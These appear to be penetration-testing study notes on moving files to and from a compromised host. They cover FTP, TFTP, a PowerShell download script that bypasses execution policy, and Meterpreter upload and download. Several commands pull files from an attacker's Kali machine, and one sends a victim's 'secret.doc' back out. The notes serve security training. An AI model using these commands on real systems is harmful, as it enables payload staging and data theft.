10.6 : Web app exploitation - File transfers

Common File Transfers Method

Http

• Use nginx / apache for the service

FTP

• setup ftp server by python-pyftpdlib

  cd /var/yourdir
  python -m python-pyftpdlib -p 21
  

• Windows or Linux both acceptable

  echo open [kali ip] 21> ftp.txt
  echo USER anonymous>> ftp.txt # username
  echo pass>> ftp.txt # password
  echo bin>> ftp.txt # binary mode
  echo GET [file]>> ftp.txt
  echo bye>> ftp.txt
  ftp -v -n -s:ftp.txt
  

TFTP

• Windows XP, 2003
• Windows 7 or later need to be installed manually.
• Attack side

  mkdir /tftp
  atftpd --daemon --port 69 /tftp
  

• victim

  tftp -i $SrcIP get $filePath
  

Linux

• wget
• curl
• ftp

Windows

• ftp
• powershell

  echo $storageDir = $pwd >wget.ps1
  echo $webclient = New-Object System.Net.WebClient >>wget.ps1
  echo $url = "http://[kali ip]/[file]" >>wget.ps1
  echo $file = "[file]" >>wget.ps1
  echo $webclient.DownloadFile($url,$file) >>wget.ps1
  powershell.exe -ExecutionPolicy Bypass -NoLogo -NonInteractive -NoProfile -File wget.ps1
  

Metasploit

• need to get shell on the machine first
• then use meterpreter by sessions command

upload /var/www/html/exploit.php  c:\\Users\\IEUser\\exploit.php
download c:\\Users\\IEUser\\secret.doc /var/www/html/secret.doc